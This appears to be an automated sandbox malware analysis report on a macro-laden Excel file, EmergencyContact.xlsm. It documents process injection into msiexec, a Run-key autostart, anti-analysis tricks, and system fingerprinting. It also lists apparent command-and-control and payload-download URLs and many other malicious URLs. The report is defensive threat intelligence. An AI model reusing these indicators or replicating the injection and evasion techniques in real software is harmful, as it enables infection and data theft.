Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe 'C:\cYNhYPc\mVVJuWs\FTBSEIi.exe'	Jump to behavior
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Process created: C:\Windows\System32\msiexec.exe msiexec.exe	Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Unpacked PE file: 2.2.FTBSEIi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Unpacked PE file: 2.2.FTBSEIi.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Code function: 2_2_0040D8F0 LoadLibraryA,GetProcAddress,

2_2_0040D8F0

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_0042B18B push esi; ret	2_2_0042B1B4
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_001BB878 push esi; ret	2_2_001BB8B1
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_001AD984 push esi; retf	2_2_001AD985
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_001AC1D3 push esp; iretd	2_2_001AC21C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_001AA357 push edx; retf	2_2_001AA45C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_001AA440 push edx; retf	2_2_001AA45C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003EA5DB push esi; ret	2_2_003EA604
Source: C:\Windows\System32\msiexec.exe	Code function: 4_2_0009B18B push esi; ret	4_2_0009B1B4
Source: C:\Windows\System32\msiexec.exe	Code function: 4_2_0009CCBB push edx; ret	4_2_0009CCE6

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Witaubi			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Witaubi			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain checking for process token information

Show sources

Source: C:\Windows\System32\msiexec.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-15646

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\msiexec.exe TID: 1260	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2160	Thread sleep count: 158 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2160	Thread sleep time: -9480000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2160	Thread sleep time: -60000s >= -30000s	Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Code function: 2_2_0040D8F0 LoadLibraryA,GetProcAddress,

2_2_0040D8F0

Contains functionality to read the PEB

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_0041F3E0 mov eax, dword ptr fs:[00000030h]	2_2_0041F3E0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_001A7CD3 push dword ptr fs:[00000030h]	2_2_001A7CD3
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003C092B mov eax, dword ptr fs:[00000030h]	2_2_003C092B
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003C0D90 mov eax, dword ptr fs:[00000030h]	2_2_003C0D90
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003DF630 mov eax, dword ptr fs:[00000030h]	2_2_003DF630
Source: C:\Windows\System32\msiexec.exe	Code function: 4_2_0008F3E0 mov eax, dword ptr fs:[00000030h]	4_2_0008F3E0

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 70000 protect: page read and write			Jump to behavior
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: A0000 protect: page read and write			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Code function: 2_2_004172D0 EntryPoint,CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

2_2_004172D0

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Thread register set: target process: 400

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Memory written: C:\Windows\System32\msiexec.exe base: 70000			Jump to behavior
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Memory written: C:\Windows\System32\msiexec.exe base: A0000			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Process created: C:\Windows\System32\msiexec.exe msiexec.exe

Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Queries the product ID of Windows

Show sources

Source: C:\Windows\System32\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
18:32:01	API Interceptor	541x Sleep call for process: msiexec.exe modified
18:32:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Witaubi C:\Users\user\AppData\Roaming\Imed\tufi.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
EmergencyContact.xlsm	2%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.3.FTBSEIi.exe.600000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.msiexec.exe.70000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.FTBSEIi.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.3.tufi.exe.200000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.3.msiexec.exe.220000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://march262020.site/post.php	0%	Avira URL Cloud	safe
http://www.march262020.live/post.phpAS	0%	Avira URL Cloud	safe
http://march262020.club/post.php	0%	Avira URL Cloud	safe
http://march262020.live/post.phpcs	0%	Avira URL Cloud	safe
http://march262020.store/post.php	0%	Avira URL Cloud	safe
http://www.march262020.live/post.php	0%	Avira URL Cloud	safe
http://www.march262020.live/post.phph	0%	Avira URL Cloud	safe
http://march262020.club/files/app.bin	0%	Avira URL Cloud	safe
http://www.march262020.live/post.php-	0%	Avira URL Cloud	safe
http://march262020.live/post.php	0%	Avira URL Cloud	safe
http://march262020.com/post.php	0%	Avira URL Cloud	safe
http://march262020.best/post.php	0%	Avira URL Cloud	safe
http://march262020.network/post.php	0%	Avira URL Cloud	safe
http://march262020.tech/post.php	0%	Avira URL Cloud	safe
http://march262020.online/post.php	0%	Avira URL Cloud	safe
http://march262020.live/post.phpU	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
119.28.234.224	EmergencyContact.xlsm	Get hash	malicious	Browse
170.106.11.8	EmergencyContact.xlsm	Get hash	malicious	Browse	march262020.com/post.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	EmergencyContact.xlsm	Get hash	malicious	Browse	198.54.117.218
	Resume John Doe.doc	Get hash	malicious	Browse	198.54.117.211
	analysis.xlsm	Get hash	malicious	Browse	198.54.117.218
	analysis.xlsm	Get hash	malicious	Browse	198.54.117.215
	analysis.xlsm	Get hash	malicious	Browse	198.54.117.215
	2201283765ref20181203_pdf.exe	Get hash	malicious	Browse	198.54.117.211
	23Order A32443u43.exe	Get hash	malicious	Browse	198.54.117.215
	74Request for Quotation.exe	Get hash	malicious	Browse	198.54.117.218
	PO OMULQP214R8.xlsx	Get hash	malicious	Browse	198.54.117.215
	12PO Order No. 305930960MN.exe	Get hash	malicious	Browse	198.54.117.211
	faktura_151018_9022871.vbs	Get hash	malicious	Browse	198.54.117.218
	faktura_111018_0077975.vbs	Get hash	malicious	Browse	198.54.117.215
	13PAYMENT-Jawharat Al-Wefaq Gen. Trad. & Cont. Corp.doc	Get hash	malicious	Browse	198.54.117.211
	22DOC1.exe	Get hash	malicious	Browse	198.54.117.215
	42PAYMENT INSTRUCTION.exe	Get hash	malicious	Browse	198.54.117.210
	15request.exe	Get hash	malicious	Browse	198.54.117.215
	7INV_P-130828-01.exe	Get hash	malicious	Browse	198.54.117.216
	http://blockchaln.info	Get hash	malicious	Browse	198.54.117.215
	17scantr doc.exe	Get hash	malicious	Browse	198.54.117.211
	69IMG_0047.exe	Get hash	malicious	Browse	198.54.117.211
march262020.club	EmergencyContact.xlsm	Get hash	malicious	Browse	170.106.11.8

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	EmergencyContact.xlsm	Get hash	malicious	Browse	162.255.119.36
	New inv.976215.xls	Get hash	malicious	Browse	192.168.2.255
	sample1-unpacked.exe	Get hash	malicious	Browse	16.121.0.129
	sample1-unpacked.exe	Get hash	malicious	Browse	16.91.196.254
	Req_Form6982.xls	Get hash	malicious	Browse	47.91.88.100
	sample1.exe	Get hash	malicious	Browse	167.89.123.54
	rept-1194.xls	Get hash	malicious	Browse	47.91.88.100
	sample1.exe	Get hash	malicious	Browse	16.100.81.99
	https://ankitchawlaphotography.com/staple/433426.zip	Get hash	malicious	Browse	127.0.0.1
	https://onedrive.live.com/redir?resid=3A73AD1A7DAF274C!1235&authkey=!AMMPdXLDeVZdNDs&ithint=file%2cpdf	Get hash	malicious	Browse	52.114.132.20
	https://carexpert.ee/2rehvid/api/hotmail-verifly/index.php?email=martin.piller@abcsupply.com	Get hash	malicious	Browse	88.99.147.202
	Invoice-No-583.xls	Get hash	malicious	Browse	47.91.88.100
	http://perfumegallery.com.au/OMACH/FBG/	Get hash	malicious	Browse	162.241.174.123
	http://d19b4k8ycsi5o2.cloudfront.net/d/?id=jHhgjdgd-JHShgfs-JHsgsh&p1=innodom53.com/man/alessandroa@herbalife.com	Get hash	malicious	Browse	152.199.23.37
	cybx.js	Get hash	malicious	Browse	180.180.123.9
	cybx.js	Get hash	malicious	Browse	180.180.123.9
	recoverit_setup_full4174.exe	Get hash	malicious	Browse	47.91.67.36
	Invoice_ID.787228.xls	Get hash	malicious	Browse	47.91.88.100
	Info.42171.xls	Get hash	malicious	Browse	192.168.2.255
	open_presentation_m8w.js	Get hash	malicious	Browse	5.53.125.140
unknown	EmergencyContact.xlsm	Get hash	malicious	Browse	162.255.119.36
	New inv.976215.xls	Get hash	malicious	Browse	192.168.2.255
	sample1-unpacked.exe	Get hash	malicious	Browse	16.121.0.129
	sample1-unpacked.exe	Get hash	malicious	Browse	16.91.196.254
	Req_Form6982.xls	Get hash	malicious	Browse	47.91.88.100
	sample1.exe	Get hash	malicious	Browse	167.89.123.54
	rept-1194.xls	Get hash	malicious	Browse	47.91.88.100
	sample1.exe	Get hash	malicious	Browse	16.100.81.99
	https://ankitchawlaphotography.com/staple/433426.zip	Get hash	malicious	Browse	127.0.0.1
	https://onedrive.live.com/redir?resid=3A73AD1A7DAF274C!1235&authkey=!AMMPdXLDeVZdNDs&ithint=file%2cpdf	Get hash	malicious	Browse	52.114.132.20
	https://carexpert.ee/2rehvid/api/hotmail-verifly/index.php?email=martin.piller@abcsupply.com	Get hash	malicious	Browse	88.99.147.202
	Invoice-No-583.xls	Get hash	malicious	Browse	47.91.88.100
	http://perfumegallery.com.au/OMACH/FBG/	Get hash	malicious	Browse	162.241.174.123
	http://d19b4k8ycsi5o2.cloudfront.net/d/?id=jHhgjdgd-JHShgfs-JHsgsh&p1=innodom53.com/man/alessandroa@herbalife.com	Get hash	malicious	Browse	152.199.23.37
	cybx.js	Get hash	malicious	Browse	180.180.123.9
	cybx.js	Get hash	malicious	Browse	180.180.123.9
	recoverit_setup_full4174.exe	Get hash	malicious	Browse	47.91.67.36
	Invoice_ID.787228.xls	Get hash	malicious	Browse	47.91.88.100
	Info.42171.xls	Get hash	malicious	Browse	192.168.2.255
	open_presentation_m8w.js	Get hash	malicious	Browse	5.53.125.140

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report EmergencyContact.xlsm

Overview

General Information

Detection

Confidence

Classification Spiderchart

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Malware Configuration

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails